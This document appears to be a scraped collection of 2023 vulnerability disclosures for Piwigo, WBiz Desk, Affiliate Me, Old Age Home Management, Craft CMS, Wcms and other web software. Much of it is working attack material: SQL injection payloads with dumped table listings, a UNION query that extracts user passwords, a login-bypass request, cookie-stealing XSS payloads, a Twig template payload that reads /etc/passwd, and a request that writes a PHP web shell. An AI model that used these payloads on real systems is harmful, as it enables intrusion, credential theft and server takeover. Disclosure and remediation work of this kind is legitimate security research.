Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.

Accessing the 'profile' page  

Add the 'user\_id' parameter with single quotes  

Discovering an error in MySQL can actually prove the existence of SQL injection, but we can still try using the sleep() function for testing  
  

//Try to analyze how this vulnerability was generated from a code level perspective.  

First find '/admin/profile.php'  

Track build\_user() function (in the /Piwigo/include/functions\_user.inc.php)  

The '$user\_id' enters the getuserdata() function, so continue tracking getuserdata()  

Finally, the '$user\_id' variable will enter this string of SQL statements, which clearly does not filter the incoming parameter values, resulting in SQL injection  

This vulnerability affects the latest version up to 13.6.0, and it is uncertain whether other versions will be affected.

CVE-2023-33362: There is a SQL Injection in the "profile" function of piwigo · Issue #1911 · Piwigo/Piwigo

WBiz Desk version 1.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phpGET parameter 'tk' is vulnerable to RXSShttp://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb[-] Done

WBiz Desk 1.2 Cross Site Scripting

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phphttp://website/ticket.php?tk=1&idtk=[SQLi]&action=closeGET parameter 'idtk' is vulnerable to SQL Injection---Parameter: idtk (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close---[+] Starting the Attackfetching current databasecurrent database: 'wbizdesk_*****_com_br'fetching tables[12 tables]+----------------+| accounts       || category       || chat           || config         || customers      || departments    || email_template || log_tb         || messages       || tickets        || tutorial       || users          |+----------------+fetching columns for table 'customers'[19 columns]+--------------+-------------------+| Column       | Type              |+--------------+-------------------+| name         | varchar(160)      || number       | varchar(11)       || status       | enum('S','B','N') || address      | varchar(255)      || city         | varchar(160)      || company      | varchar(160)      || country      | varchar(60)       || cpf_cnpj     | varchar(60)       || email        | varchar(255)      || id           | int(11)           || ip           | varchar(90)       || neighborhood | varchar(160)      || obs          | text              || os           | varchar(160)      || pass         | varchar(160)      || phrase       | varchar(160)      || salt         | varchar(255)      || state        | varchar(160)      || zipcode      | varchar(60)       |+--------------+-------------------+[-] Done

WBiz Desk 1.2 SQL Injection

Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection[#] Exploit Date: May 16, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: Affiliate Me[#] Application Version: 5.0.1[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]/admin.php?show=reply&id=[Injected Query][#] 3xample:[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -[#] Notes:- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.

Affiliate Me 5.0.1 SQL Injection

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID\=n8igimmg4o7ddmpnbfueujouvg
Content\-Length: 62
Cache\-Control: max\-age\=0
Sec\-Ch\-Ua: "Not:A-Brand";v\="99", "Chromium";v\="112"
Sec\-Ch\-Ua\-Mobile: ?0
Sec\-Ch\-Ua\-Platform: "Windows"
Upgrade\-Insecure\-Requests: 1
Origin: https://pwnedhost.com
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>
  
  <title>Old Age Home Management System|| Dashboard</title>
  
  <link rel="stylesheet" href="vendors/typicons/typicons.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  
  
</head>

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

WebPlus Pro v1.4.7.8.4-01 is vulnerable to Incorrect Access Control.

\[CVE ID\]

CVE-2020-20012

\[PRODUCT\]

WebPlus Pro

\[VERSION\]

v1.4.7.8.4-01

\[Vulnerability Type\]

Incorrect Access Control

\[DESCRIPTION\]

WebPlus Pro v1.4.7.8.4-01 is vulnerable to Incorrect Access Control.

\[CVE ID\]

CVE-2023-31814

\[PRODUCT\]

D-Link DIR-300

\[VERSION\]

firmware<=REVA1.06,<=REVB2.06

\[Vulnerability Type\]

File inclusion

\[DESCRIPTION\]

D-Link DIR-300 firmware <=REVA1.06 and <=REVB2.06 is vulnerable to File inclusion via /model/\_\_lang\_msg.php.

CVE-2020-20012: CVE

SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-29919: GitHub - xiaosed/CVE-2023-29919

IT Sourcecode Content Management System Project In PHP and MySQL With Source Code 1.0.0 is vulnerable to Cross Site Scripting (XSS) via /ecodesource/search_list.php.

**Content-Management-Systemv1.0-has-Cross-site-Scripting-XSS-**

Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

Vul\_Author: TzssZ

vendors: https://itsourcecode.com/free-projects/php-project/content-management-system-in-php-with-source-code/

Vulnerability File: /ecodesource/search\_list.php

Vulnerability location: POST /ecodesource/search\_list.php HTTP/1.1\\r\\n

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert: 

When you enter the system,click 'search' 

input a XSS script in input boxes,such as "<script>alert(document.cookie)</script>",it will expose cookie.

click search,and you will obtain its cookie.

CVE-2023-31816: GitHub - TzssZ/Content-Management-System-v1.0-has-Cross-site-Scripting-XSS-: Content Management System In PHP With Source Code has Cross-site Scripting (XSS)

### Summary
Unrestricted file extension lead to a potential Remote Code Execution
(Authenticated, ALLOW_ADMIN_CHANGES=true)

### Details
#### Vulnerability Cause : 
If the name parameter value is not empty string('') in the View.php's doesTemplateExist() -> resolveTemplate() -> _resolveTemplateInternal() -> _resolveTemplate() function, it returns directly without extension verification, so that arbitrary extension files are rendered as twig templates (even if they are not extensions set in defaultTemplateExtensions = ['html', 'twig'])
```php
    /**
     * Searches for a template files, and returns the first match if there is one.
     *
     * @param string $basePath The base path to be looking in.
     * @param string $name The name of the template to be looking for.
     * @param bool $publicOnly Whether to only look for public templates (template paths that don’t start with the private template trigger).
     * @return string|null The matching file path, or `null`.
     */
    private function _resolveTemplate(string $basePath, string $name, bool $publicOnly): ?string
    {
        // Normalize the path and name
        $basePath = FileHelper::normalizePath($basePath);
        $name = trim(FileHelper::normalizePath($name), '/');

        // $name could be an empty string (e.g. to load the homepage template)
        if ($name !== '') {
            if ($publicOnly && preg_match(sprintf('/(^|\/)%s/', preg_quote($this->_privateTemplateTrigger, '/')), $name)) {
                return null;
            }

            // Maybe $name is already the full file path
            $testPath = $basePath . DIRECTORY_SEPARATOR . $name;

            if (is_file($testPath)) {
                return $testPath;
            }

            foreach ($this->_defaultTemplateExtensions as $extension) {
                $testPath = $basePath . DIRECTORY_SEPARATOR . $name . '.' . $extension;

                if (is_file($testPath)) {
                    return $testPath;
                }
            }
        }

        foreach ($this->_indexTemplateFilenames as $filename) {
            foreach ($this->_defaultTemplateExtensions as $extension) {
                $testPath = $basePath . ($name !== '' ? DIRECTORY_SEPARATOR . $name : '') . DIRECTORY_SEPARATOR . $filename . '.' . $extension;

                if (is_file($testPath)) {
                    return $testPath;
                }
            }
        }

        return null;
    }
```

When attacker with admin privileges on the DEV or Misconfigured STG, PROD, they can exploit this vulnerability to remote code execution **(ALLOW_ADMIN_CHANGES=true)**


### PoC
**Step 1)** Create a new filesystem. **Base Path: /var/www/html/templates**
![1](https://user-images.githubusercontent.com/30969523/228049254-6c3a9897-c26a-46a5-96ad-41c7b769116a.png)

**Step 2)** Create a new asset volume. **Asset Filesystem: template**
![2](https://user-images.githubusercontent.com/30969523/228049839-d2d42245-fa6e-4245-9fd2-967f1b9f4a74.png)

**Step 3)** Upload poc file( .txt , .js , .json , etc ) with twig template rce payload
```twig
{{'<pre>'}}
{{1337*1337}}
{{['cat /etc/passwd']|map('passthru')|join}}
{{['id;pwd;ls -altr /']|map('passthru')|join}}
```
![7](https://user-images.githubusercontent.com/30969523/228051307-623b78d0-4792-44ae-af0f-aff6b16f8d87.png)
![5](https://user-images.githubusercontent.com/30969523/228051064-cfaad338-3aff-4c4f-a177-9b42e473142b.png)

**Step 4)** Create a new global set with template layout. The template filename is poc.js
![8](https://user-images.githubusercontent.com/30969523/228051430-365457eb-2a10-47a8-aed9-fb400e80c6d5.png)

**Step 5)** When access global menu or /admin/global/test, poc.js is rendered as a template file and RCE confirmed
![9](https://user-images.githubusercontent.com/30969523/228053142-62a0f1ad-bbfa-4b8d-b6bd-28ed26c1cc18.png)

**Step 6)** RCE can be confirmed on other menus(Entries, Categories) where the template file is loaded.
![10](https://user-images.githubusercontent.com/30969523/228054216-5dcd0c30-85bd-4603-84e5-944cfe9ad93c.png)
![11](https://user-images.githubusercontent.com/30969523/228054146-d5a3ceea-e13d-461a-bcd6-abf260761d62.png)


**Poc Environment)** ALLOW_ADMIN_CHANGES=true, defaultTemplateExtensions=['html','twig']
![0](https://user-images.githubusercontent.com/30969523/228054764-37d78cf5-5eca-442f-873a-99e6676b8173.png)
![13](https://user-images.githubusercontent.com/30969523/228054803-1a2c40b0-e515-46b3-a653-bb5ef1a287a2.png)
![14](https://user-images.githubusercontent.com/30969523/228054821-c7b0cfd6-126a-4722-846c-26d725af1a6a.png)

### Impact
Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

Additionally, there are 371 domains using CraftCMS exposed on Shodan, and among them, 33 servers have "stage" or "dev" included in their hostnames. 

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)

![2023-03-31 10 29 53](https://user-images.githubusercontent.com/30969523/229001176-4c235b2f-e1a3-4b96-965a-78f227546a12.png)

### Remediation
Recommend taking measures by referring to https://github.com/craftcms/cms-ghsa-9f84-5wpf-3vcf/pull/1
```php
            // Maybe $name is already the full file path
            $testPath = $basePath . DIRECTORY_SEPARATOR . $name;

            if (is_file($testPath)) {
                // Remedation: Verify template file extension, before return
                $fileExt = pathinfo($testPath, PATHINFO_EXTENSION);
                $isDisallowed = false;

                if (isset($fileExt)) {
                    $isDisallowed = !in_array($fileExt, $this->_defaultTemplateExtensions);

                    if($isDisallowed) {
                        return null;
                    } else {
                        return $testPath;
                    }
                }
            }
```

![remediation](https://user-images.githubusercontent.com/30969523/228841202-43079754-0d9d-47fa-8ae3-ce5dd509796b.png)

**Summary**

Unrestricted file extension lead to a potential Remote Code Execution  
(Authenticated, ALLOW\_ADMIN\_CHANGES=true)

**Details****Vulnerability Cause :**

If the name parameter value is not empty string('') in the View.php's doesTemplateExist() -> resolveTemplate() -> \_resolveTemplateInternal() -> \_resolveTemplate() function, it returns directly without extension verification, so that arbitrary extension files are rendered as twig templates (even if they are not extensions set in defaultTemplateExtensions = \['html', 'twig'\])

    /\*\*
     \* Searches for a template files, and returns the first match if there is one.
     \*
     \* @param string $basePath The base path to be looking in.
     \* @param string $name The name of the template to be looking for.
     \* @param bool $publicOnly Whether to only look for public templates (template paths that don’t start with the private template trigger).
     \* @return string|null The matching file path, or \`null\`.
     \*/
    private function \_resolveTemplate(string $basePath, string $name, bool $publicOnly): ?string
    {
        // Normalize the path and name
        $basePath = FileHelper::normalizePath($basePath);
        $name = trim(FileHelper::normalizePath($name), '/');

        // $name could be an empty string (e.g. to load the homepage template)
        if ($name !== '') {
            if ($publicOnly && preg\_match(sprintf('/(^|\\/)%s/', preg\_quote($this\->\_privateTemplateTrigger, '/')), $name)) {
                return null;
            }

            // Maybe $name is already the full file path
            $testPath = $basePath . DIRECTORY\_SEPARATOR . $name;

            if (is\_file($testPath)) {
                return $testPath;
            }

            foreach ($this\->\_defaultTemplateExtensions as $extension) {
                $testPath = $basePath . DIRECTORY\_SEPARATOR . $name . '.' . $extension;

                if (is\_file($testPath)) {
                    return $testPath;
                }
            }
        }

        foreach ($this\->\_indexTemplateFilenames as $filename) {
            foreach ($this\->\_defaultTemplateExtensions as $extension) {
                $testPath = $basePath . ($name !== '' ? DIRECTORY\_SEPARATOR . $name : '') . DIRECTORY\_SEPARATOR . $filename . '.' . $extension;

                if (is\_file($testPath)) {
                    return $testPath;
                }
            }
        }

        return null;
    }

When attacker with admin privileges on the DEV or Misconfigured STG, PROD, they can exploit this vulnerability to remote code execution **(ALLOW\_ADMIN\_CHANGES=true)**

**PoC**

**Step 1)** Create a new filesystem. **Base Path: /var/www/html/templates**  

**Step 2)** Create a new asset volume. **Asset Filesystem: template**  

**Step 3)** Upload poc file( .txt , .js , .json , etc ) with twig template rce payload

{{'<pre>'}}
{{1337\*1337}}
{{\['cat /etc/passwd'\]|map('passthru')|join}}
{{\['id;pwd;ls -altr /'\]|map('passthru')|join}}

  

**Step 4)** Create a new global set with template layout. The template filename is poc.js  

**Step 5)** When access global menu or /admin/global/test, poc.js is rendered as a template file and RCE confirmed  

**Step 6)** RCE can be confirmed on other menus(Entries, Categories) where the template file is loaded.  
  

**Poc Environment)** ALLOW\_ADMIN\_CHANGES=true, defaultTemplateExtensions=\['html','twig'\]  
  
  

**Impact**

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

Additionally, there are 371 domains using CraftCMS exposed on Shodan, and among them, 33 servers have "stage" or "dev" included in their hostnames.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW\_ADMIN\_CHANGES=true, there is still a potential security threat (Remote Code Execution)

**Remediation**

Recommend taking measures by referring to https://github.com/craftcms/cms-ghsa-9f84-5wpf-3vcf/pull/1

            // Maybe $name is already the full file path
            $testPath = $basePath . DIRECTORY\_SEPARATOR . $name;

            if (is\_file($testPath)) {
                // Remedation: Verify template file extension, before return
                $fileExt = pathinfo($testPath, PATHINFO\_EXTENSION);
                $isDisallowed = false;

                if (isset($fileExt)) {
                    $isDisallowed = !in\_array($fileExt, $this\->\_defaultTemplateExtensions);

                    if($isDisallowed) {
                        return null;
                    } else {
                        return $testPath;
                    }
                }
            }

**References**

*   GHSA-vqxf-r9ph-cc9c
*   https://nvd.nist.gov/vuln/detail/CVE-2023-32679
*   https://github.com/craftcms/cms/releases/tag/4.4.6

GHSA-vqxf-r9ph-cc9c: Craft CMS vulnerable to Remote Code Execution via unrestricted file extension 

In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution.

Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file

**Vulnerability discovery**

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file

if (isset($\_GET\['finish'\])) {
    $path = $\_GET\['finish'\];
    file\_put\_contents($path, $\_POST\['textAreaCode'\]);

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file\_put\_contents function to write malicious code into a custom file

**construct poc**

Use controllable variables to write malicious code into the shell.php file in the current directory  
The payload is as follows：

    POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
    Host: 192.168.3.10
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
    Upgrade-Insecure-Requests: 1
    Content-Length: 36
    
    textAreaCode=<?php system('whoami');?>
    

  
It can be seen that the write is successful  

**get shell**

Access the written malicious file, find that the malicious code is successfully executed, and echo it out

Tag

#php